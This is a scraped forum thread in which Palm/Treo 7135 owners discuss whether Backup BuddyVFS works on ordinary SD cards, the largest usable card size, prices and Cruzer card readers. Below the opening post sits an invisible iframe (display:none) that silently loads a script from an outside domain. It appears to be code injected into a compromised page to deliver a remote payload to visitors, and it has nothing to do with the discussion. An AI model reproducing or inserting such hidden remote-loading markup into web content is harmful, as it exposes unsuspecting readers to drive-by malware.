+ Reply to Thread

Question about SD Cards?

I was looking at the SanDisk Site and noticed that they sell a SD Expansion card and a SD Card. The site states that the SD Expansion card is used for Palm based apps for a convenient flash card plus backup application using Backup BuddyVFS. Now I just purchased the Cruzer with a 256MB SD card. Can I backup apps on to the 256MB SD card using Backup BuddyVFS or do I have to purchase a 32MB SD Expansion card. Will I only be able to use the 256MB SD card for to store pics and MP3.
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

No, your gut feeling is correct. BB VFS works on any SD card. You DO NOT need an official backup card. Just enjoy your 256 and have VFS back up the internal ram to your 256 card.

My 256 SD card had apps, photos, mp3s, BB VFS, video clips, you name it.
    ~'kito
    pdaPhoneHome Moderator

Another Question on SD cards

Hi guys,
    While waiting for Verizon to get off thier A%$, I am considering ordering an SD card and reader.
    What is the largest size SD card that will work for the 7135?? I tried a search, no luck. I had read somewhere some time that there was a 256MB limit.
    Any suggestions as to brand of card, and reader????

Thanks in advance!!!
    Tom
    To most people, the sky is the limit.
    To those who love flight, the sky is home

Re: Another Question on SD cards

Originally posted by scout706
    What is the largest size SD card that will work for the 7135?? I tried a search, no luck. I had read somewhere some time that there was a 256MB limit.
    I had read here of a 512mb SD card that someone bought. You might be able to search to find out specifics.

I tried to look for the largest SD card, and I could not find anything greater than 256. I purchased mine yesterday from ecost.com for $69, including the Cruzer USB drive(SanDisk). This was the cheapest I could find.

Correction

Sorry, there are 512mb SD cards out there, but there $280 and up. I can by four 256mb cards for that price. Not worth the price for me.

The 7135 has NO limit to the size of the SD card. People have used 512MB SD cards on the 7135 and I know a guy who beta tested a 1gig SD card (which isn't on the market yet) and it worked beautifully! So the sky is the limit!
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    The 7135 has NO limit to the size of the SD card. People have used 512MB SD cards on the 7135 and I know a guy who beta tested a 1gig SD card (which isn't on the market yet) and it worked beautifully! So the sky is the limit!
    And so is the price! :cashwalle

Originally posted by mbrahm
    I tried to look for the largest SD card, and I could not find anything greater than 256. I purchased mine yesterday from ecost.com for $69, including the Cruzer USB drive(SanDisk). This was the cheapest I could find.

Amazon has 512 MB sd cards but they are $300+, not worth it in my opinion.

Has anybody had any experience with downloading mp3's directly to the card through hot sync's, as oppsed to buying one of those cruizer card readers? I'm trying to decide whether to just buy the card and stick it in the phone or buy the cruizer thing and do everything externally.

Get a cruzer. They are packaged with an SD card for about the same price as the SD card by iteslf.

Through the sync cradle takes 3-4x as long.